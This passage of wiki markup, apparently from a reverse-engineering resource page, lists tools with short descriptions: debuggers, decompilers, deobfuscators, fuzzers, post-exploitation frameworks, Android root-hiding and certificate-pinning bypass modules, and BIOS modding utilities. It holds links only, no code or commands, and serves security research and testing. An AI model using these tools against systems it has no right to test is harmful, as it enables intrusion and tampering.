:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for &amp;quot;all&amp;quot; versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.&lt;br /&gt;
&lt;br /&gt;
*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.&lt;br /&gt;
&lt;br /&gt;
::GDB Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.&lt;br /&gt;
&lt;br /&gt;
====Debugging and Profiling dynamic analysis (Linux)====&lt;br /&gt;
&lt;br /&gt;
*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.&lt;br /&gt;
&lt;br /&gt;
*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====.NET (CLR)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo &amp;amp; '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)]  - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.&lt;br /&gt;
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.&lt;br /&gt;
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&amp;amp;more) - cross-platform!&lt;br /&gt;
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.&lt;br /&gt;
&lt;br /&gt;
======.NET deobfuscators======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.&lt;br /&gt;
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.&lt;br /&gt;
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.&lt;br /&gt;
&lt;br /&gt;
======.NET memory dumpers======&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).&lt;br /&gt;
::*[https://github.com/fremag/MemoScope.Net MemoScope.Net] - is a tool to analyze .Net process memory: it can dump an application's memory in a file and read it later. The dump file contains all data (objects) and threads (state, stack, call stack).&lt;br /&gt;
::*[https://github.com/0x410c/ClrDumper ClrDumper] - is a tool that can dump .NET assemblies and scripts from native clr loaders, managed assembly and vbs, jscript or powershell scripts.&lt;br /&gt;
&lt;br /&gt;
======.NET tracers======&lt;br /&gt;
&lt;br /&gt;
::*[https://web.archive.org/web/20150515023954/http://www.reteam.org/board/showthread.php?t=939 dotNET Tracer 2.0 by Kurapika] - is a simple tool that has a similar functionality to RegMon or FileMon but it's designed to trace events in .NET assemblies in runtime. [[Media:KDT2.0.zip]] [https://www.virustotal.com/gui/file/d29afcc5115c28f9892f7a6d249423374ad77ac86f69b316665c347982975d02 VT1] [https://www.virustotal.com/gui/file/04cd51dbbc3d2b4fe4a721e4ad0c2f3012fe0f409dc902b430207ea25561ff8c VT2] (thermida packed), pw: recessim.com&lt;br /&gt;
::*[https://github.com/smourier/TraceSpy TraceSpy] - is a open source and free, alternative to the very popular SysInternals DebugView tool.&lt;br /&gt;
&lt;br /&gt;
=====JAVA (JVM) Decompilers=====&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/Col-E/Recaf Recaf] - Recaf is an open-source Java bytecode editor that simplifies the process of editing compiled Java applications.&lt;br /&gt;
:*[https://www.pnfsoftware.com/ JEB decompiler] - Decompile and debug Android dalvik, Intel x86, ARM, MIPS, RISC-V, S7 PLC, Java, WebAssembly &amp;amp; Ethereum Decompilers.&lt;br /&gt;
&lt;br /&gt;
======JAVA (ART/APK)======&lt;br /&gt;
The tooling you need for Android application reverse engineering of the Java virtual machine bytecode. Traditional Java Virtual Machine (JVM) and Android Runtime (ART) that utilizes AOT compilation over JIT.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/skylot/jadx Jadx] - Dex to Java decompiler. Command-line and GUI tools for producing Java source code from Android Dex and apk files.&lt;br /&gt;
:*[https://github.com/honeynet/apkinspector/ APKinspector] - is a powerful GUI tool for analysts to analyze the Android applications.&lt;br /&gt;
:*[https://apktool.org/ Apktool] - A tool for reverse engineering Android apk files.&lt;br /&gt;
:*[https://github.com/androguard/androguard Androguard] - is a full python tool to play with Android files. DEX, ODEX; APK; Android's binary xml; Android resources; Disassemble DEX/ODEX bytecodes.&lt;br /&gt;
:*[https://github.com/Konloch/bytecode-viewer Bytecode viewer] - is a Java 8+ Jar &amp;amp; Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger &amp;amp; More)&lt;br /&gt;
:*[https://github.com/niranjan94/show-java ShowJava] - is an APK (android application), JAR &amp;amp; Dex decompiler for android.&lt;br /&gt;
:*[https://github.com/tp7309/TTDeDroid TTDeDroid] - is a tool for quickly decompiling apk/aar/dex/jar.&lt;br /&gt;
:*[https://github.com/JesusFreke/smali smali/baksmali] - is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on Jasmin's/dedexer's syntax.&lt;br /&gt;
&lt;br /&gt;
======RASP (Runtime Application Self-Protection) Android======&lt;br /&gt;
To effectively audit applications, testers often intentionally make their devices vulnerable to simplify testing.&amp;lt;br&amp;gt;&lt;br /&gt;
In response, application developers implement countermeasures such as detecting emulators, debuggers, and checking if the device is secure and not rooted.&amp;lt;br&amp;gt;&lt;br /&gt;
The current focus of this technology is on the vulnerabilities of Java and .NET platforms.&lt;br /&gt;
:*[https://arxiv.org/pdf/2312.17726 arXiv:2312.17726 (cs.CR)] - is a paper regarding Interactive Application Security Testing (IAST) and RASP Tools.&lt;br /&gt;
:*[https://github.com/securevale/android-rasp Android-RASP] - is a solution for protecting Android apps against being run on vulnerable devices.&lt;br /&gt;
&lt;br /&gt;
======JAVA deobfuscators (mixed platforms)======&lt;br /&gt;
There is nothing more annoying than coroutines (ProGuard), c-flow, function virtualization, class and name renaming and junk code while decompiling code. Here are a few off the shelf deobfuscators.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/CalebFenton/simplify simplify] - Android virtual machine and generic deobfuscator.&lt;br /&gt;
:*[https://github.com/java-deobfuscator/deobfuscator deobfuscator] - is a project that aims to deobfuscate most commercially-available obfuscators for Java. [https://github.com/java-deobfuscator/deobfuscator-gui GUI version github]&lt;br /&gt;
:*[https://github.com/GraxCode/threadtear Threadtear] - is a multifunctional deobfuscation tool for java, ZKM and Stringer support, Android support is in development.&lt;br /&gt;
:*[https://github.com/narumii/Deobfuscator Another Deobfuscator] - Some deobfuscator for java. Supports superblaubeere27 / JObf / sb27, Paramorphism 2.1.2_9, Caesium, Monsey, Skid/qProtect, Scuti, CheatBreaker, Bozar, ...&lt;br /&gt;
&lt;br /&gt;
======JAVA decompilers (platform independent)======&lt;br /&gt;
:*[https://github.com/fesh0r/fernflower Fernflower] - is a powerful open-source Java decompiler that reconstructs readable Java source code from compiled bytecode, widely used and integrated into IntelliJ IDEA.&lt;br /&gt;
&lt;br /&gt;
====Debuggers / Disassemblers for '''unmanaged''' binaries====&lt;br /&gt;
&lt;br /&gt;
=====AutoIt=====&lt;br /&gt;
AutoIt decompilers extract or anything else related to reverse engineering AutoIt binaries.&lt;br /&gt;
:*[https://github.com/JacobPimental/exe2aut exe2aut] - is a tool that converts executable (.exe) files into AutoIt script (.aut) source code, attempting to reverse-engineer compiled AutoIt programs.&lt;br /&gt;
:*[https://github.com/nazywam/AutoIt-Ripper AutoIt-Ripper] - is a short python script that allows for extraction of &amp;quot;compiled&amp;quot; AutoIt scripts from PE executables.&lt;br /&gt;
&lt;br /&gt;
=====VB6=====&lt;br /&gt;
Early .NET applications compile native and p-code meaning there is not a easy way to decompile these like with newer .NET framework exectables. &lt;br /&gt;
:*[https://www.vb-decompiler.org/ VB Decompiler Pro] - is a commercial software tool that decompiles and analyzes programs written in Visual Basic 5.0/6.0 and also .NET for reverse engineering and code recovery purposes.&lt;br /&gt;
&lt;br /&gt;
====Bytecode Decompilers====&lt;br /&gt;
&lt;br /&gt;
=====React Native Hermes=====&lt;br /&gt;
If you plan on looking inside a compiled React Native Asset for doing a security audit, these tools come in handy.&lt;br /&gt;
&lt;br /&gt;
:*[https://github.com/P1sec/hermes-dec hermes-dec] - A reverse engineering tool for decompiling and disassembling the React Native Hermes bytecode.&lt;br /&gt;
:*[https://github.com/Pilfer/hermes_rs hermes_rs] - Bytecode disassembler and assembler.&lt;br /&gt;
:*[https://github.com/bongtrop/hbctool hbctool] - Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode).&lt;br /&gt;
&lt;br /&gt;
=====Python=====&lt;br /&gt;
To reverse or decompile binaries generated by IronPython, which compiles Python code into Common Intermediate Language (CIL) targeting the Common Language Infrastructure (CLI), you should use decompilation tools designed for managed assemblies rather than traditional Python bytecode tools.&lt;br /&gt;
:*[https://github.com/rocky/python-uncompyle6 uncompyle6] - is a native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.&lt;br /&gt;
:*[https://github.com/zrax/pycdc pycdc] - is a C++ python bytecode disassembler and decompiler.&lt;br /&gt;
:*[https://github.com/Cisco-Talos/pyrebox PyREBox] - is a Python scriptable Reverse Engineering sandbox by Cisco-Talos. It is based on QEMU, and its goal is to aid reverse engineering by providing dynamic analysis and debugging capabilities from a different perspective.&lt;br /&gt;
:*[https://github.com/snare/voltron Voltron] - is an extensible debugger UI toolkit written in Python. It aims to improve the user experience of various debuggers (LLDB, GDB, VDB and WinDbg) by enabling the attachment of utility views that can retrieve and display data from the debugger host.&lt;br /&gt;
&lt;br /&gt;
=====Lua=====&lt;br /&gt;
:*[https://github.com/scratchminer/unluac unlua] - is a decompiler that converts compiled Lua 5.1 bytecode files (.luac) back into readable Lua source code.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Fuzzers====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).&lt;br /&gt;
&lt;br /&gt;
*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel &amp;amp; redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.&lt;br /&gt;
&lt;br /&gt;
====PC platform exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.&lt;br /&gt;
&lt;br /&gt;
*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.&lt;br /&gt;
&lt;br /&gt;
====Mobile exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.&lt;br /&gt;
&lt;br /&gt;
::LSPosed Module Repository&lt;br /&gt;
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].&lt;br /&gt;
&lt;br /&gt;
::Xposed modules&lt;br /&gt;
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.&lt;br /&gt;
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.&lt;br /&gt;
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..&lt;br /&gt;
&lt;br /&gt;
::Xposed Framework API Development Documentation&lt;br /&gt;
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.&lt;br /&gt;
&lt;br /&gt;
====Network Inspection====&lt;br /&gt;
&lt;br /&gt;
=====Promiscuous mode eavesdropping TCP/UDP=====&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.&lt;br /&gt;
&lt;br /&gt;
::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or &amp;quot;sniffer&amp;quot;, for Linux, macOS, &amp;amp;#42;BSD and other Unix and Unix-like operating systems and for Windows.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source &amp;amp; easy to use integrated penetration testing tool for finding vulnerabilities in web applications.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis &amp;amp; modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.&lt;br /&gt;
&lt;br /&gt;
=====HTTP(S) Debuggers / Web Debuggers=====&lt;br /&gt;
&lt;br /&gt;
::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/httptoolkit  HTTP Toolkit] - is a beautiful, cross-platform &amp;amp; open-source HTTP(S) debugging proxy, analyzer &amp;amp; client, with built-in support for modern tools from Docker to Android to GraphQL.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler &amp;amp; Postman together with beautiful, modern UI &amp;amp; collaboration features.&lt;br /&gt;
&lt;br /&gt;
::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.&lt;br /&gt;
&lt;br /&gt;
=====Other Network Tools=====&lt;br /&gt;
&lt;br /&gt;
::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).&lt;br /&gt;
&lt;br /&gt;
::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.&lt;br /&gt;
&lt;br /&gt;
::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====BIOS (basic input/output system) firmware modifying software====&lt;br /&gt;
Unified Extensible Firmware Interface (UEFI) &amp;amp; legacy computer BIOS (basic input/output system) firmware modifying software.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====UEFI=====&lt;br /&gt;
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.&lt;br /&gt;
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.&lt;br /&gt;
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]&lt;br /&gt;
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]&lt;br /&gt;
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o because of SMM protection or variable locking.&lt;br /&gt;
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.&lt;br /&gt;
&lt;br /&gt;
=====BIOS (legacy)=====&lt;br /&gt;
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.&lt;br /&gt;
:::'''AMI'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]&lt;br /&gt;
